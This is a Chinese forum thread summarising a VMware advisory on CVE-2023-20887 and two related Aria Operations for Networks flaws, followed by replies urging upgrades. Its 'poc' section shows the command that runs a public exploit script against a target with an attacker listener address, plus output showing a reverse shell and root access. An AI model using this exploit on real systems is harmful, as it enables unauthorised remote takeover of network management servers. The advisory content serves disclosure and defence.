VMware Aria Operations for Networks命令注入漏洞
VMware Aria Operations for Networks (以前称为vRealize Network Insight,vRNI)是一款网络可视性和分析工具,可以帮助管理员优化网络性能或管理和扩展各种VMware和Kubernetes部署。
6月8日,启明星辰VSRC监测到VMware发布安全公告,修复了Aria Operations Networks 6.x中的一个命令注入漏洞(CVE-2023-20887),该漏洞的CVSSv3评分为9.8,对 VMware Aria Operations for Networks 具有网络访问权限的威胁者可以通过执行命令注入攻击,从而导致远程代码执行。
此外,VMware Aria Operations for Networks 6.x中还修复了一个反序列化漏洞(CVE-2023-20888,CVSSv3评分9.1),对Aria Operations for Networks 具有网络访问权限的经过身份验证的恶意用户可以执行反序列化攻击,从而导致远程代码执行;以及修复了另一个信息泄露漏洞(CVE-2023-20889,CVSSv3评分8.8),对Aria Operations for Networks具有网络访问权限的威胁者可以通过执行命令注入攻击,导致信息泄露。
影响范围
VMware Aria Operations Networks版本:6.x
poc:
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Re: VMware Aria Operations for Networks命令注入漏洞
感谢分享这个重要的漏洞情报。CVE-2023-20887评分高达9.8,而且影响的是6.x整个大版本,影响面确实不小。POC已经出来了,建议相关管理员尽快升级到修复版本,或者在无法立即打补丁时做好网络访问控制,避免暴露在公网。另外两个漏洞也需要一并关注。Re: VMware Aria Operations for Networks命令注入漏洞
感谢分享这个重要漏洞情报!CVE-2023-20887 和 CVE-2023-20888 的严重性很高(9.8和9.1),尤其是不需要认证就能利用的命令注入,风险很大。建议使用 Aria Operations for Networks 6.x 的用户尽快参考 VMware 官方安全公告进行升级或采取缓解措施,避免被攻击者利用。POC 看起来很有参考价值,希望官方补丁能及时覆盖所有受影响版本。Re: VMware Aria Operations for Networks命令注入漏洞
感谢楼主分享!这几个漏洞评分都很高,特别是CVE-2023-20887无需认证就能RCE,风险极大。有POC更是提醒我们得赶紧检查版本,尽快更新到修复版本或采取临时缓解措施。Re: VMware Aria Operations for Networks命令注入漏洞
感谢分享这个重要的漏洞情报!VMware Aria Operations for Networks 这几个漏洞都非常严重,尤其是 CVE-2023-20887 无需认证即可远程执行代码,CVSS 9.8 的评分说明影响极大。如果你在生产环境中有部署 6.x 版本的建议尽快升级到修复版本,同时检查网络访问控制,避免未授权用户接触管理接口。POC 已公开,很可能很快会有批量扫描出现,安全优先级很高。
页:
[1]